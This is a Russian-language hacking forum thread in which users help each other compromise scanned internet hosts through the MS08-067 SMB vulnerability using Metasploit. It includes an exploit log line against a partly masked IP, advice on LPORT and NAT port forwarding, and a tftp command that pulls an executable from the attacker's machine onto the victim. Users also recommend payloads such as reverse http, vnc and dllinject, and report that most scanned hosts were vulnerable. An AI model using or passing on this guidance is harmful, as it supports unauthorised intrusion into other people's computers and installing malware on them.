Так вот вопрос... Запускаю МС GUI, появляться картинка типа идёт загрузка, при этом процесс отнимает у системы одно ядро и 2 гб оперы, повесит секунд 30 и исчезает... после этого нечего не открывается(всмысле сам МС) и процесс исчезает....в чем проблема ? ---- Решил проблему, поставил вин 2к на виртуалку
stopxaker Как друг, можешь мне в личку кидать один IP(на который у тебя шелл подключается), чтоб пробовать с моего компа через метасплоит подключается или нет? может проблема у меня, что я за NAT_ом сижу или что то еще? обешаю, не опубликовать и ничего не делать в дедике. просто как появится шелл - сразу закроюсь.
stopxaker спасибо конечно, но это не то, что я хотел. я хотел со своего проверить. ну и ладно, вот со скрина взял тот IP, на которого ты подключился и результат: а вообше у тебя там другой порт. т.е. место 445 другой (не пишу здесь какой).
порт там у меня 4444 это LPORT , а по поводу Code: 22:55:11 - ms08_067_netapi [-] Exploit failed: The connection timed out (**.**.171.11:445). Можешь со своего компа даже больше и не пробывать , я с такой же байдой месяц промыкался , и всем остальным пишу !!! Люди пока у вас сканер не покажет реально что открыт 445 порт как на моём скрине , даже и не дёргайтесь !!! Ищите сети в которых будет открыт это 445 порт , в аську не стучите , таких сетей не знаю , ищите сами !
stopxaker можешь пожалуйста поподробней описать как ты туда проник, и вабще непонял немного если провы всё блокируют то по твоему способу ничего не получится сделать???
stopxaker вообшето там у тебя 2526 порт был, но это уже не важно. У тебя щас есть такой IP, по которому реально подключится через шелл по 445 порту? я в цельях убеждений, что у меня все в порядке!?
всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?
Так по поводу ftp , я уже писал , что фтп я настроил под anonymous без пароля , подошёл только такой способ , с паролями происходит висяк , тем боле на фиг нужен пароль , если всё равно фтп на дедике поднимать : Такое было когда был юзабельным LSA сплойт , в данном случае , из 20 компов на 3 если повезёт 5 можно поймать шелл
дак когда anonymous всеравно требует мэйл в качестве пароля. проверил нащёт Triggering the vulnerability у жертвы в это время выскакивает сообщение об ошибке с запросом отправить отчёт об ошибке после чего комп жоска виснет.
tftp в этих случаях может помочь, можешь взять здесь , если стоишь за натом открывай порт 66, в cmd пишешь Code: tftp -i tvoi-ip-adress get fail.exe , -этот способ более удобный. У кого останаливается trigerring vulnerability.. сделайте порт форвардинг на 4444 порт(если вы стоите за НАТ), вырубите все фаеры у себя. Начинки **/http (через 80 порт), vnc, dllinject более реальные используйте их.
